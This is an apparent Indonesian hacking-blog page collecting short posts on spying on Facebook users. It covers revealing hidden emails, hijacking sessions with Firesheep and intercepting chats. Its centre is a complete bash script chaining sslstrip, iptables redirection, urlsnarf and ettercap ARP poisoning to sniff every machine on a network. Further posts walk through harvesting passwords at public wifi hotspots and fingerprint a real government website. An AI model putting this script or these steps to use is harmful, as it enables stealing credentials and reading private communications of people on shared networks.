Free Premium Script www.indowebmart.com
Iseng bantuin kasi backlink ke situs indowebmart , apakah terindeks cepat di google…??? http://indowebmart.com
cek besok disini : http://www.google.co.id/search?q=indowebmart
Melihat email pengguna facebook yang terprivasi
Berbekal tutorial yang dibagikan sama aciz aka ninj4 ( http://www.facebook.com/note.php?note_id=490595996085&id=176432934603 ) tentang bagaimana melihat email teman facebook yang memprivasi infonya agar alamat emailnya tidak di tampakkan untuk orang lain, kita inisiatif bikin videonya, bukan untuk show off atau apa… cuman update blog 
Pencurian akun facebook dengan firesheep
nah mungkin dah banyak yang tau nih… berikut video tutor cara mencuri akun facebook dengan memanfaatkan addons firefox bernama firesheep, addons ini memanfaatkan kelemahan penggunaan cookie pada facebook, maka dengan addons ini kita bisa masuk ke akun fb orang lain yang satu jaringan dengan kita dan sedang membuka fb dengan otoritas sessions cookie.. boleh di kata cookie hijacking maybe.. h h h h h video tutornya di bawah…. kalau mau install firesheep… disini
Menyadap chatting facebook dalam jaringan
Sebelumnya Greetzzz buat http://deadc0de.or.id dan http://devilzc0de.org sebagai sumber referensi utama saya…. di tulisan ini….
di video ini kita praktekkan bagaimana melakukan penyadapan dalam jaringan, khususnya pengguna facebook, karena kita akan melakukan penyadapan chatting facebook…. 
tutorial ini sangat mudah untuk di ikuti, apalagi nuibi seperti saya yang kadang-kadang begtu rumit dalam penggunaan tools – tools dalam sistem operasi unix / linux, software yang kita pakai disini adalah IMMonitor facebook spy, tools ini shareware alias tidak gratis, tapi kalau ingin mencoba dikasih waktu trial selama 10 … , cara penggunaannya pun sangat mudah, mulai ari download, kemudian install kemudian di jalankan, nah untuk setting dan hasil yang di munculkan ada nih sya ikutkan dalam video….
oh iya sekali lagi, kita bukan mau ngajarin yang tidak-tidak, kita cuman memberikan gambaran dalam sisi lain IT lifestyle, jadi jangan di hubung-hubungkan dengan institusi segala h h h h , kita cuman memberikan gambaran POC alias proof of concept begitu rentannya keamanan dari sisi IT itu sendiri, buat yang udah nonton gak usah jadi paranoid segala, yang penting bagaimana mengimplementasikan berinternet sehat dalam kehidupan sehari-hari,
DOWNLOAD IMMonitor Facebook Spy
Mengamankan file rahasia
Kesempatan ini kita tunjukkan bagaimana mengamankan file-file rahasia agar suatu hari tidak mudah di buka atau di sabotase oleh tangan-tangan tidak bertanggung jawab, aspek sekuritas menjadi prioritas saat ini, betapa tidak di pandang dari sudut aspek keamanan kita tidak ingin terjadi hal-hal seperti yang dialami”ariel” peterpan, yang begitu sembrono membiarkan file-file pribadinya tidak diamankan sama sekali, sehingga pada hari ini kita lihat apa yang terjadi kemudian, kita memang mungkin bukanlah orang tenar yang perlu sebegitu paranoidnya mengamankan data, namun kadang hal-hal spesifik harus lebih di perhatikan sisi keamanannya, untuk kebaikan masa mendatang dan keperluan atas aspek dari berbagai sisi…
autosniff network bash script
berbekal dari tulisan http://blackpolri.wordpress.com/2010/12/01/mass-sniff-via-network/ mari kita membuat script sederhana dari tutor itu dan kita kembangkan, teman-teman boleh mengubah isi script, jangan lupa mengedit secara manual etter.conf di /etc/etter.conf, kemudian jangan lupa untuk menginstall tcpxtract sebelum menjalankan script ini, (apt-get install tcpxtract),
#!/bin/bash
#
TERM=xterm
echo “|> gambar akan di ekstract dari pcap file, pastikan tcpxtract terinstal”
echo -n “|> Interface yg digunakan? contoh wlan0 : “
read -e IFACE
echo -n “|> IP Gateway – Biarkan kosong untuk Sniff seluruh jaringan : “
read -e ROUTER
echo -n “|> Target IP – Biarkan kosong untuk Sniff seluruh jaringan : “
read -e VICTIM
echo “Melakukan konfigurasi”
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
$TERM -e “sslstrip -a -k -f” &
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 &
urlsnarf -i $IFACE | grep http > /root/URLSNARF.txt &
echo 1 > /proc/sys/net/ipv4/ip_forward &
$TERM -e “ettercap -T -q -i $IFACE -w /root/ettercap.pcap -M arp /$ROUTER/ /$VICTIM/”
tcpxtract -f /root/ettercap.pcap
killall sslstrip
killall python
killall urlsnarf
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
exit 0
silahkan di save pakai nama apa saja, entah itu pakai ahiran sh atau tidak usah, yg jelas pakai backtrack itu sudah disesuaikan, kalau pakai distribusi linux lain, install dulu dsniff, ettercap, sslstrip dlll, ikuti sja scriptnya gan.
setelah itu jangan lupa kasi permision dengan perintah chmod +x
cara menjalankan tinggal ketik
./sniff.sh kalau disimpan dengan nama sniff.sh
whatweb tools identifikasi jenis web
Kebanyakan kendala bagi para penetretion tester website aplication pemula seperti saya adalah bagaimana mengidentifikasi jenis website yang di gunakan oleh target, nah meskipun sebenarnya tools ini sudah lama tapi pengembangannya selalu terupdate sehingga tools ini patut untuk diacungi jempol, selain ketepatannya mengidentifikasi jenis website yang digunakan, serta dukungan 250 plugin yang setiap saat tersedia untuk di update. whatweb “Next generation web scanner. Identify what websites are running.” begitu kata sang developer (http://www.morningstarsecurity.com/research/whatweb) yah sbenarnya tidak berlibahan sih… mari kita langsung praktekkan di situs http://gowakab.go.id
root@deadc0de:/pentest/enumeration/www/whatweb# ./whatweb http://www.gowakab.go.id
ERROR: Plugin Tag-Hash failed. can’t convert nil into String
http://www.gowakab.go.id [200] AdobeFlash, AtomFeed[/index.php?format=feed&type=rss], Cookies[3bdaea873d9436e3bc8b08843ec78061], RSSFeed[/index.php?format=feed&type=rss], PasswordField[passwd], HTTPServer[Apache], MetaGenerator[Joomla! 1.5 - Open Source Content Management], Joomla[1.5][com_content,com_jevents,com_mailto,com_phocagallery,com_phocaguestbook,com_qcontacts,com_remository,com_user], Title[..: Situs Resmi Pemerintah Kabupaten Gowa :..], Footer-Hash[4c3c127f5008f5c822448ab384f1f30c], Div-Span-Structure[08b46edb8d8d6d7c4ea3f3c743eaf428], Header-Hash[7399f2299f63e855f4fe6e36c48726c9]
root@deadc0de:/pentest/enumeration/www/whatweb#
dan hasilnya kurang dari 10 detik saja, tools sudah memberikan info bahwa jenis aplikasi website yang digunakan http://gowakab.go.id adalah content management system joomla versi 1.5 dan berbagai info tambahan lainnya.
tertarik…???
DOWNLOAD WHATWEB.tar.gz (linux only)
Mass Sniff Via Network
ALAT & BAHAN :
- Komputer dengan OS Linux ( Di rekomendasikan menggunakan Backtrack soalnya semua tools yang di butuhkan sudah komplit )
- SSLstrip (http://www.thoughtcrime.org/software/sslstrip/)
- Ettercap (http://ettercap.sourceforge.net/)
seperti ditulisan sebelumnya http://blackpolri.wordpress.com/2010/11/22/panen-password-di-area-hotspot/, tapi kelemahan di tutorialnya menurut saya yang rakus ini adalah korban hanya 1 saja, yakni kita hanya mampu melakukan penyadapan hanya terbatas pada satu target saja, kira-kira bagaimana ya, caranya agar supaya target kita tidak terbatas pada 1 komputer saja tapi seluruh komputer yang aktif dalam jaringan yang sama dengan kita???
di konsole kita ketikkan perintah :
root@deadc0de:~# nano /etc/etter.conf
untuk melakukan editing konfigurasi ettercap menggunakan editor nano,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih,
Code: Select all
[privs]
ec_uid = 0 # nobody is the default 65534
ec_gid = 0 # nobody is the default 65534
kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command (lagi…)
Backtrack R2 code name “nemesis” telah tersedia
setelah sukses menghadirkan distro khusus untuk para penetration tester, dan dengan dukungan sistem yang berbasis debian, kini backtrack hadir dengan wajah baru, Backtrack R2 codenamed “nemesis”. sebenarnya rilis publik tergolong cukup cepat bahkan sangat cepat, perasaan kemarin baru 2 bulan yang lalu saya mengunduh dan menggunakan backtrack R1 sebagai primary OS saya, hari ini muncul lagi dengan versi R2 nya dengan berbagai perubahan dan perbaikan serta kompatibilitas hardware.
namun pengguna backtrack versi lama tak perlu bersusah – susah untuk mendownload ulang versi R2 ini, secara ukuran download ekstensi ISO distro ini cukup besar, 2 GB lebih.. jadi pengguna yang telah sebelumnya menginstall versi 4 final atau R1, tinggal mengetikkan di konsole
root@bt# apt-get update && apt-get dist-upgrade
root@bt:~# apt-get dist-upgrade
root@bt:~# apt-get install linux-image-2.6.35.8
jika muncul pertanyaan untuk mengupdate lsb-realese ketik Y
Configuration file `/etc/lsb-release'
==> Modified (by you or by a script) since installation.
==> Package distributor has shipped an updated version.
What would you like to do about it ? Your options are:
Y or I : install the package maintainer's version
N or O : keep your currently-installed version
D : show the differences between the versions
Z : background this process to examine the situation
The default action is to keep your current version.
*** lsb-release (Y/I/N/O/D/Z) [default=N] ? y
kemudian muncul layar biru dengan tulisan "configuring linux image..." pilih NO
kemudian muncul tulisan "what would you do with menu.lst" Pilih install_new
perintah diatas akan secara otomatis memperbaharui sistem lama anda. lumayan sih dari pada mengunduh ISO sebesar 2 GB.
Info lebih lanjut : Linux-Bactrack
Panen Password di area hotspot
Isi konten artikel ini sebagai panduan pada kegiatan yang diadakan deadc0de goes to school, di materi ini tentang bagaimana melakukan penyadapan dalam jaringan publik baik itu wifi seperti area hotspot yang banyak ditemukan di makassar, maupun lan,seperti pada jaringan warnet dalam kaitannya tentang bagaimana mengcapture atau menangkap data-data komunikasi SSl (transport secure layer) sehingga pada hasil ahir yang kita dapatkan adalah menangkap username maupun password client dalam jaringan, nah dibawah ini adalah langkah-langkah yang kita lakukan :
Semua tools yang saya gunakan disini sudah terinclude di sistem operasi Backtrack RC1
di konsole kita ketikkan perintah :
root@deadc0de:~# nano /etc/etter.conf
untuk melakukan editing konfigurasi ettercap,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih,
[privs]
ec_uid = 0 # nobody is the default 65534
ec_gid = 0 # nobody is the default 65534
kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command (lagi…)
tinggalkan komentar